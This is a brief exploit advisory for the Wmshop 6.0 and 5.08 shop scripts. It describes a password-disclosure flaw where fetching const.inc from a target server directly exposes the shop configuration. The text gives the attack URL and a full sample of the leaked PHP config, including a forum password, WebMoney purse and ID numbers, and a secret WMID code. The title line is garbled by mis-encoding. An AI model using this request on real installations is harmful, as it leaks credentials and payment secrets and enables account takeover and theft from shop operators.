< ------------------- header data start ------------------- >
#############################################################

# Application Name : Wmshop 6.0 - 5.08

# Vulnerable Type : Arbitrary Forum password Disclosure Vulnerability

# Infection : Forum password Get...

# author : Septemb0x

# Script Down.& WebSite : http://s2.dosya.tc/wmshop_6.0.rar.html - http://s2.dosya.tc/wmshop_5.08.rar.html - https://merchant.webmoney.ru/conf/purses.asp

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

EXPLOIT :
http://target/path/const.inc

GET TO;
<?
$serv_const_name=shop;
$serv_const_embox=[email protected];
$serv_const_forum_pass=Gdssn6Fdgh;
$serv_const_title=�������� �������� �� ������� �������� �������;
$serv_const_servname=localhost;
$serv_const_commission=0.05;
$serv_const_lstcount=25;
$serv_const_lstrekom=20;
$serv_const_shopwmz=Z65656565665;
$serv_const_shopwmid=645634564556;
$serv_const_secretcod_wmid=gFdGdx2d5FGmJt5DevALJg6;
?>

< -- bug code end of -- >